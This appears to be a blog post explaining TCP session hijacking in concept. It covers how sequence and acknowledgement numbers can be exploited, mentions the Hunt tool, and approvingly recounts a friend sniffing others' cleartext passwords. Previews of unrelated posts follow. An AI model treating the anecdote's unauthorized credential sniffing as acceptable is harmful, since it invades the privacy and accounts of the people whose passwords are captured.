Skip to main content

TCP Session Hijacking

Although TCP appears to be safe protocol because of all the negotiation involved in session establishment and all the protocol and the precision involved in data exchanged, don't get complacent.its not much secure than it should be. Network Sniffers can be setup  on the unsuspected machine to sniff the data on the network and they can snoop clear text data such userIds and passwords that are not encrypted in any way. I have one of my friend who did all this ,, he sniffed a dozen passwords and played with their network data. He was very much expert in doing sniffing and using them, othes friend don't even know their passwords are just floating in raw txt on the network.
Session hijacking software, such as Hunt, uses another approach to exploit an existing TCP session. These attempt to intercept an established TCP session and hijack one end of the connection from the session to an evil host.

 The problem is that conventional TCP exchanges do not require any authentication or confirmation that they are the actual hosts involved in a previously established connection. After a session has been established between two hosts, those hosts use the following to reconfirm the corresponding host:


  • IP number:The established IP numbers of the hosts must not change.
  • Port numbers : Most protocols communicate between established ports only; ports do not change.
  • Sequence numbers :  Sequence numbers must change predictably in respect to the ISN and the aggregate number of bytes sent from one host to another.
  • Acknowledgement numbers : Acknowledgement numbers must change in respect to delivered sequence numbers and aggregate bytes acknowledged from one host to another.

If a hostile user can observe data exchanges and successfully intercept an ongoing connection with all the authentication parameters properly set, he can hijack a session. Imagine the damage that can be done if this hijacked session is one that has root authority. Many complications and considerations are involved in session hijacking. It is not a trivial endeavor, but it is made simpler using the Hunt software.
Labels:

Comments

Post a Comment

Popular posts from this blog

Database Sharding

Collating some of the resources which talks about Database Sharding. https://en.wikipedia.org/wiki/Shard_(database_architecture) [Feb 2019]  http://highscalability.com/blog/2019/2/19/intro-to-redis-cluster-sharding-advantages-limitations-deplo.html Redis Cluster is the Native Sharding implementation available within Redis that allows your to automatically distribute your data across multiple nodes without having to rely on external tools and utilities. Its covers Sharding with Redis Cluster  where Redis Clusters is divided in 16384 slots and these slots are assigned to multiple Redis Nodes. The  Redis Cluster Specification  is the definitive guide to understanding the internals of the technology, while the  Redis Cluster Tutorial  provides deployment and administration guidelines. [ Jan 2019  ]  https://scalegrid.io/blog/scalegrid-hosting-adds-support-for-highly-available-redis-clusters-with-automated-sharding/ ScaleGrid : Fully Manage...
Post a Comment
Read more

Designing a URL Shortening Service

Designing a URL Shortening Service like TinyURL Lets design a URL Shortening service like TinyURL. This service will provide short short URLs for a large URL. What is the Problem ? URLs can be pretty huge depending upon the resources like the following : https://news.google.com/topics/CAAqIggKIhxDQkFTRHdvSkwyMHZNREZqY0hsNUVnSmxiaWdBUAE?hl=en-IN&gl=IN&ceid=IN%3Aen  ,  I think this Shortening was majorly used in Twittor where there is a limit of 140 characters.  Requirements of the System Its always necessary to clear out the requirements with the Stakeholders on what are the expectations they are making, This will ensure that our System is designed as per the Requirements.  Questions which are already answered  We need to design a system which will store a shorter version of URL that was given. When somebody clicks that shorter URL , request will hit our Service and they will be redirected to the original URL. Questions wh...
Post a Comment
Read more